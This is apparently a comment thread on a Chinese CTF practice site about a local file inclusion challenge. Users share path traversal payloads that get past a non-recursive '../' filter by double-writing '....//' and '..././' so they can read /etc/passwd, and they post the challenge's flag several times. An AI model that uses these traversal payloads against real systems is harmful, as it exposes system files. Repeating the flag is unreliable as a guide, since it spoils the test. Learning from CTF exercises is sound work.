lfi

1005667204 @ 2024-05-21 23:22:09 👍0

使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd

18993258097 @ 2024-05-20 23:22:09 👍0

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

菜鸡的小韩 @ 2024-05-16 23:22:09 👍0

这是一个基本的绕过，因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格，所以要进行一个绕过，用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可

ABC第一深情 @ 2024-04-07 23:22:09 👍0

/?language=/etc/passwd

旦提 @ 2024-04-07 23:22:09 👍0

直接用file:///etc/passwd居然也行 oAo

XHTX @ 2024-04-07 23:22:09 👍0

?language=/languages//..//..//..//....//etc/passwd shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3} 就是这个样子

868954104 @ 2024-01-07 23:22:09 👍0

?language=/languages/....//....//....//....//etc/passwd

868954104 @ 2024-01-07 23:22:09 👍0

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

yituoshi @ 2023-11-07 23:22:09 👍0

Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol

hh0100 @ 2023-11-07 23:22:09 👍0

?language=./languages/....//....//....//....//etc/passwd,加这个成功了，谁能讲讲为啥

hack111 @ 2023-12-07 23:22:09 👍0

双写，../被屏蔽了然后还会存在一个../

详情

lfi

去做题